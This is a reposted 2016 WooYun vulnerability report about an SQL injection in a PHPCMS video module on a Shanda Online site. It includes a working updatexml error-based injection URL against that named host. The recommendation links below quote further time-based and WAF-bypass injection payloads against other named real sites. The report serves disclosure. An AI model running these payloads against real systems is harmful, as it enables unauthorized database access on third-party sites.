盛大在线某站存在SQL注射漏洞(第三方应用)

最新推荐文章于 2022-12-19 20:38:53 发布
最新推荐文章于 2022-12-19 20:38:53 发布
阅读量331 收藏
点赞数
分类专栏: 安全实战

缺陷编号: WooYun-2016-177346

漏洞标题: 盛大在线某站存在SQL注射漏洞(第三方应用)

相关厂商: 盛大在线

漏洞作者: 路人甲

提交时间: 2016-02-21 09:20

公开时间: 2016-03-07 01:11

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

================================================================================================

详细说明:

证明下 WooYun: PHPCMS某处注入(版本/条件限制) 这个洞的价值


使用phpcms拥有视频功能一般都会中招
 

code 区域

http://video.sdo.com/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=11&title=12&description=%E9%8C%A6&keywords=,updatexml(1,concat(0x3a,(select%20user())),1),1,1,1,1)%23



这个是老版本的吧 竟然没有

code 区域

str_replace(array('select','from','concat'),'',$data['keywords'])

的过滤
 

1.png


 

QQ图片20160220202532.png

 

漏洞证明:

1.png

 

QQ图片20160220202532.png

 

修复方案:

 

版权声明:转载请注明来源 路人甲@乌云

 

 

 

大方子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
防saq注入_盛大在线另一分站某SQL注入
weixin_39642981的博客
12-22 570
未对用户输入正确执行危险字符清理漏洞证明:存在问题参数txtGameUserName测试HTTP请求时间响应Payload:123'; waitfor delay '0:0:3' 3秒123'; waitfor delay '0:0:9' 9秒123'; waitfor delay '0:0:6' 6秒POST请求POST /VocGameUserBlockList.aspx HTTP/1.1Co...
一个典型的sql注入漏洞
liuyuer的专栏
07-25 1467
真的很简单,想想,真可怕. http://www.whphs.com/index1.asp or=
常见漏洞(一)SQL注入
qq_41588309的博客
04-28 590
常见漏洞原理及防御 SQL注入 原理:SQL注入是通过给web应用接口传入一些特殊字符,欺骗服务器来实现恶意查询语句的执行 1.1注入方式 获取数据分类:回显注入、盲注、报错注入 常见注入位置:post注入、get注入、cookie注入、搜索注入 其他:base64注入、延时注入 1.2常见SQL注入绕过方法 1.2.1宽字节注入 由于GB2312、GBK、GB18030、BIG5等编码占用两...
【缺陷周话】第2期:SQL 注入
12-04 624
*声明:《缺陷周话》栏目系列文章由360代码卫士团队原创出品。未经许可,禁止转载。 代码审计是使用静态分析发现源代码中安全缺陷的方法,能够辅助开发或测试人员在软件上线前较为全面地了解其安全问题,防患于未然,因此一直以来都是学术界和产业界研究的热点,并且已经成为安全开发生命周期SDL和D...
sql 注射_令人惊讶的注射
最佳 Java 编程
07-08 135
sql 注射 所以,我欠吉姆道歉。 他编写了一个有效的模拟和JUnit测试,我在回顾中告诉他,我认为它没有达到他的预期。 当我错了时,这种情况对我来说就像是一个错误 。 称它为理想的意外副作用。 假设您有以下两类: public class Service { private String name; private Widget widget; pu...
dvbbs 8.2 SQL Injection注射漏洞分析
09-06
标题中的“dvbbs 8.2 SQL Injection注射漏洞分析”指的是动网论坛(Dvbbs)8.2版本存在SQL注入漏洞的问题。SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用应用程序对用户输入数据的不恰当处理...
LBS blog sql注射漏洞[All version]-官方已有补丁
10-30
LBS blog sql注射漏洞[All version]-官方已有补丁
正方教务系统新版sql注入漏洞利用工具
01-19
相信研究过正方教务系统的朋友看到过网上传播的比较多的一篇文章提的/service.asmx中的BMCheckPassword存在注入,然而现在大多数正方教务已经将BMCheckPassword移除了,导致漏洞无法利用。本人研究了/service.asmx中...
CSZ CMS 1.2.X sql注入漏洞
最新发布
09-07
漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS 1.2.X版本(2019-06-20之前) ## 三、利用过程 具体见**CVE-2019-13086.py**,利用时...
三步堵死 SQL Server注入漏洞
12-15
许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,获得某些想得知的...
CMS V5.7 SP2漏洞复现(CVE-2018-20129)
haoaaao的博客
04-04 4712
0x00 前置 1、CVE中对该漏洞的描述: 在 DedeCMS V5.7 SP2 中发现了一个问题。uploads/include/dialog/select_images_post.php 允许远程攻击者通过双扩展名和修改的“.php”子字符串以及 image/jpeg 内容类型上传和执行任意 PHP 代码,如 filename=1 所示。 jpg.p*hp 值。 2、所需工具 (1)cms网站源码版本:DedeCMS V5.7 SP2 下载链接...
SQL 注入漏洞详解
m0_60571990的博客
12-19 3727
SQL 注入漏洞详解
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
AgonYAN的博客
07-25 3042
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
一道综合渗透题引发的updatexml()注入思考
热门推荐
Grey的博客
05-09 1万+
MYSQL数据库updatexml报错注入UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格...
漏洞学习——SQL】华图教育某分站SQL注入漏洞
Fly_鹏程万里
02-22 313
漏洞细节 有waf,比较好绕 空格用/**/替换 http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=1--+ http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=2--+ 根据返回判断存在注入 不过注入语句有长度限制 最后...
PHPCMS某处设计缺陷可致authkey泄露
aixuan9365的博客
05-25 409
在分析几个phpcms的漏洞就换分析其他的,换换口味。 漏洞来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0106892.html swfupload上传页面输出了 MD5(auth_key+sess_id)。 函数位于 /phpcms/modules/attachment/functions/global.func.php...
简单的数字型sql注入漏洞
北冥有鱼
03-24 1700
1.判断是否存在注入点 以pikachu靶场上的数字型注入漏洞为例 可以看出,这是一个注入点,我们想要知道这个注入点有没有漏洞,可以先行根据经验与知识判断这个信息是在后台怎样运行的,是以什么样的方式存放的。 我们可以先自己预测一下这个参数代码的逻辑。 首先我们是在网页上提交了一个id返回到了后端,后端返回了一个名称和邮箱,正常情况下,所有用户的数据应该是存放在数据库里面的,所以当我们输入了一个1...
安全攻防六:SQL注入,明明设置了强密码,为什么还会被别人登录
运维大湿兄的博客
04-11 1330
在正文之前,让我们先来看一个案例。某天,当你在查看应用的管理后台时,发现有很多异常的操作。接着,你很快反应过来了,这应该是黑客成功登录了管理员账户。于是,你立刻找到管理员,责问他是不是设置了弱密码。管理员很无辜地表示,自己的密码非常复杂,不可能泄漏,但是为了安全起见,他还是立即修改了当前的密码。奇怪的是,第二天,黑客还是能够继续登录管理员账号。问题来了,黑客究竟是怎么做到的呢?你觉得这里面的问题究...
MySQL updatexml报错注入
酉酉的博客
10-13 6022
updatexml () 函数 updatexml(XML_document, XPath_string, new_value); 参数 描述 XML_document String格式,为XML文档对象的名称,文中为Doc XPath_string Xpath格式的字符串 new_value String格式,替换查找到的符合条件的数...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值